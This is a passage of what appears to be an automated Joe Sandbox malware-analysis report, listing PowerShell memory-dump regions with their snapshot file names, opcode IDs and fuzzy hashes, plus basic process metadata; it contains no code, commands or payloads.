                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.1747065513.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd9b930000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ba436340d728919e00d6a87ebe2b00c390ef1b672b6a24c201ef460abd204642
                                                                                                                                                                                                                                • Instruction ID: a3874bd1798e16aa48dc16244bc8bea2d0332730f2bf0e7223018c162170f263
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba436340d728919e00d6a87ebe2b00c390ef1b672b6a24c201ef460abd204642
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3C14672B2FA8F1FEB65ABA848395B57BE1EF15314B1901FED05DC71E3DA18A8048341
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.1747065513.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd9b930000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dee096147d76070b3b9690ad54072a33e0059dff6c10f0bd5d8918f0077ed6bd
                                                                                                                                                                                                                                • Instruction ID: 9bc9824cb5cb15f075bd1933a2bd002958b9201dbc341a88cadf93dcf76ababe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dee096147d76070b3b9690ad54072a33e0059dff6c10f0bd5d8918f0077ed6bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77B12822A1FB8A1FE7AA977858756B87BE1EF46624B0901FFD099C70F3E9185C05C341
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.1747065513.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd9b930000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 468c7ba4494a682f37c8872b7887933e0adbe902cef1bf8eaaf4fdc1b8a82f9e
                                                                                                                                                                                                                                • Instruction ID: 9be79c05858202870637217484edcfdab6047aa26152f74809ea72a0cf002b10
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 468c7ba4494a682f37c8872b7887933e0adbe902cef1bf8eaaf4fdc1b8a82f9e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71810062B6FACB2FE7A696A84475525BBE1AF11254B1A01FEC04DCB1E3DA08AC448341
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.1747065513.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd9b930000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c12936a4b435933b0f37987bbbbb5e05dce501e2cc21089553351377dffce9fa
                                                                                                                                                                                                                                • Instruction ID: 2df19508eeec4d17da84542a82c7ed99d64b5ece3921ba8765c984b7aaf71245
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c12936a4b435933b0f37987bbbbb5e05dce501e2cc21089553351377dffce9fa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA310322F2FA8F1FEBB997B8147527C67D2EF51A5575A01BED059C20F2DD1CA9048201
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.1746720685.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd9b860000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                                • Instruction ID: 6188234f0a9a8889794455bda91b9f739ee5a113e8649e979f029038e8f8428c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D801A73020CB0C8FD748EF0CE451AA5B3E0FB99320F10056DE58AC36A5D632E881CB41
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2873776531.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 6d177b78c865fd6274db9e1a4a693117b4a718ca757f848527328f27b0181265
                                                                                                                                                                                                                                • Instruction ID: 64a38ab49a89c80c92a3a0223ef6fa6b5183d3042dac461e8a54afcea796b237
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d177b78c865fd6274db9e1a4a693117b4a718ca757f848527328f27b0181265
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93512722B1FA4E0FEBB997A858711B977C2EF53610F4901BED09DC21E2DD59A9018345
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2873776531.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 77973de38624cb6ae8979c6adca9aad5744fcccd0d02738f0574dcaa24d9cbf6
                                                                                                                                                                                                                                • Instruction ID: 5ab6d8eb7d5a883682a2cc5049ca7d197e6e1bfd797002051ce6cec210958eb2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77973de38624cb6ae8979c6adca9aad5744fcccd0d02738f0574dcaa24d9cbf6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F031C322F1FA8E0FE7B967A8087517876C2EF53A55F5A01BED09DC21F2DD58A9048305
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2873326693.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b930000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                                                                • Instruction ID: ce44d87cce7eff98267fbe50756949b232779974bca5f51c68c3d874fbd43ffe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A201677121CB0C4FDB48EF4CE451AA5B7E0FB95364F10056DE58AC36A5D636E881CB46
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: fR_L
                                                                                                                                                                                                                                • API String ID: 0-309903677
                                                                                                                                                                                                                                • Opcode ID: 4563e448ec32a650843d5f0dd3088c40112e234d0a44bf880205ffbe8ab35581
                                                                                                                                                                                                                                • Instruction ID: 1fe86a2981817224aa2b9dd2bb791579ca790347c995ae60ebf5973d9c837a6f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4563e448ec32a650843d5f0dd3088c40112e234d0a44bf880205ffbe8ab35581
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83222734608A5D8FDB98EF5CC898AA977E1FF68301F0501A9E85ED72A5DA35EC41CF40
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                • Opcode ID: 0a6ae938d3a2061176d56365610814c90665c3d427259dc8632cf1263129a9e6
                                                                                                                                                                                                                                • Instruction ID: 0ee91c68693205698515cb232b0cff4cea2773ecec40742d2b277db30f5cfdc2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a6ae938d3a2061176d56365610814c90665c3d427259dc8632cf1263129a9e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC918C30B0DA5C0FD764EB6CAC35AB57BD1EF99320F0502BBE05DC72A6C9189D428781
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 989d4e530002020b329ec7e732ea78c07871bffd3e41b8e4c65b1801352d3485
                                                                                                                                                                                                                                • Instruction ID: 0a2a030295a84c84372b513805295378f8ff5914beb171ee885137cec6f8c291
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 989d4e530002020b329ec7e732ea78c07871bffd3e41b8e4c65b1801352d3485
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56A13721F1D92E4BEBA8AB6848357BD62C2EF88310F4501BDD05EC32E7DD6DAD024B40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8b442369a7a810dabf82390508f314c6a66810a322cf70b40b0ab6169fbc7028
                                                                                                                                                                                                                                • Instruction ID: 5f8e21c175698c4d77f3425adda2ec734705d325b632b3ce2bc6babae4d15fe0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b442369a7a810dabf82390508f314c6a66810a322cf70b40b0ab6169fbc7028
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8071B821F09D2E4BEBA4F76884759BD63D2EF58310F4102B9E46DC32F6DE2C69424740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a36103fd2bcf8ae4c1e520897a142d4f755dd4488f78a017b2ab8cd6445bd403
                                                                                                                                                                                                                                • Instruction ID: eeb066e1ef8be9526459d73d4344137e5ab0b709c2784e8720db2542856994e0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a36103fd2bcf8ae4c1e520897a142d4f755dd4488f78a017b2ab8cd6445bd403
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE51E83170AA494FD7A4EF7CD874A657BE0FF49311B0601BAE499C72B2DA64DC81CB81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3f7df3d525a0d7fc3d03c8f1d3265b33ef834cf2e81f6b0b64402c494d57d375
                                                                                                                                                                                                                                • Instruction ID: 33c2f965c98bef39094c735b8b5cee4f2a54f987cd4896538830eaa47d3e2d8b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f7df3d525a0d7fc3d03c8f1d3265b33ef834cf2e81f6b0b64402c494d57d375
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D951E431B0D91C4FDB59EB5CD865AB973E1EF99310F0101BAD85EC72A6CE24AD428B81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                                • Instruction ID: 440c4d8872d905ec9db37d106ace39b4739859d94e71e47d2bc23a6d32343eea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD41E63131581C8FDAA4EB5CE898EA877E1FF6831271605E6E44ACB271DA66DC81CB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c0c597ae9499123ba4298ed109e6d93cd0ee23f91e30df13678a3a99c330c554
                                                                                                                                                                                                                                • Instruction ID: 0b56b0f1d09c1b1d91ddbe641816cb12d29c216f2a51e6a8a67ea9b1800c720d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0c597ae9499123ba4298ed109e6d93cd0ee23f91e30df13678a3a99c330c554
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29419921B0EA6D0FE7A9A77C58366B53BD0DF49220F0902BFD45DC32F2DC19A9428341
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7927a8e0f367fc0b3c29d1263b864440edf48c6b62f8e82a60c46e673a1b5465
                                                                                                                                                                                                                                • Instruction ID: dc0832d73d3eda09e8a1bb9acfd0440e6142dc4a36689a79a571cbb70538c8f6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7927a8e0f367fc0b3c29d1263b864440edf48c6b62f8e82a60c46e673a1b5465
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B41D531F0991E4FEBA4EB6894257B977E2EFD8350F51017AE41DC32D1DEA86D018B81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d115524fd0c124d0814c52a9d402432f18cc3bc08e06aa3b8b7cad1d587e490a
                                                                                                                                                                                                                                • Instruction ID: 9ab980129890018ef45c96aac1106d1491313be7ca8ecd26c63e32f9342aa3c8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d115524fd0c124d0814c52a9d402432f18cc3bc08e06aa3b8b7cad1d587e490a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A41A020B0D91E4FEBA8E7AC9464AB573D1EF98324F15067DD02EC32A6DD79ED418B40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 84247560fc67c3aa2c94ccb05eda436c9dfe350645fb054ec166a492ae6ee044
                                                                                                                                                                                                                                • Instruction ID: 5a64cda7c0121eae7049f9e62a92a9585a99b9f89ecb7dedf1bcdca17f9eb50e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84247560fc67c3aa2c94ccb05eda436c9dfe350645fb054ec166a492ae6ee044
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA41F831F0A92E4FEBA4DB6894217B937E1EF88350F01017AE42DC32D5DEA96D458B81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9092a91561a7ed82c9e9b2667dd4f54e281988fd3a9addf905e1add8314c4fe1
                                                                                                                                                                                                                                • Instruction ID: 040f420d18806dfb4cbc96494b93483c1c7e542a3e236f111ec5cd5dc2b6d31b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9092a91561a7ed82c9e9b2667dd4f54e281988fd3a9addf905e1add8314c4fe1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA41E631B0952E4BEB64EFACA4616F977E1EF94361F01017AE01DC31E2CEA96D058B91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f36ee94a7b9bd68c3b39234b0209c75efe190094003265bb309494b7be6d6e6a
                                                                                                                                                                                                                                • Instruction ID: 6466efb031b2fcb67f3cbbf1c29fe8bf567bf59c6475ce6a16161ba4854edc0e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f36ee94a7b9bd68c3b39234b0209c75efe190094003265bb309494b7be6d6e6a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31E230B0A95D4FDBA8EB6CC460B6477D1FF88360F1501B9D05EC72A2DE59AC828B40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 80d5dda32ffbdd61460e8e4332d87bb79d7c2fdc14e8e6e7baeac36f307ec5c7
                                                                                                                                                                                                                                • Instruction ID: 57d2fee1ff5fafbb7871ceac7e956cee94f1baa6ea6515a9c9964e4867283838
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80d5dda32ffbdd61460e8e4332d87bb79d7c2fdc14e8e6e7baeac36f307ec5c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D631D431B0952E4BEBA4EF6894217FD77E1EF98361F01013AE41DD32D1CEA96D418A81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b1d2de4be58117344b2c3b1edba2aa1267fabf0fb06cc9ffdd2421ae5cfdc9c3
                                                                                                                                                                                                                                • Instruction ID: 71648143b093b1d28c2c180248efa330fd0c6e8f89d66d059756422c6075dc51
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1d2de4be58117344b2c3b1edba2aa1267fabf0fb06cc9ffdd2421ae5cfdc9c3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D821E527B0E59D0AD711B7ADBC614E57F64CE8223B70903F7E19DCA093D809558AC2A5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ec22e7d5722d8913783713c0c8e3ff9f3f26bf22e9d5134ca1b0724e0730f308
                                                                                                                                                                                                                                • Instruction ID: 11a4f1e6981e0a3e7c2bd3c8c945a881e7ce3636298b535574d096723a9a714f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec22e7d5722d8913783713c0c8e3ff9f3f26bf22e9d5134ca1b0724e0730f308
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8219D30629E0C8FCBA8EB6CD49496573E2FB5831174605ADE48AC7A72DA65FC42CB00
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e61d788c3b31a1e6265555f832641f98da2548dca6b1c677e6bfe64c33561b0e
                                                                                                                                                                                                                                • Instruction ID: 62b1bcdee48c5ec1572a7578b0072bd1296086e7a60994214fc0b346d882557b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e61d788c3b31a1e6265555f832641f98da2548dca6b1c677e6bfe64c33561b0e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C313230A04A2D8FDF64EB99C4549BAB3F2FF54314F014229D06AD76B5DF74A985CB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ada74070ba16fcaf4ed797ae9986415aca8baee2bc10448382b765eb23169b9e
                                                                                                                                                                                                                                • Instruction ID: 43ec1b379c875b3fcf017a3d57ff0683e7b8021ad46c7f60ab07af75b52e0e0c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ada74070ba16fcaf4ed797ae9986415aca8baee2bc10448382b765eb23169b9e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B11903130E99C8FD791EB7CD8689647BE0EF1A31271A04E7D088CB172E955DC80CB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
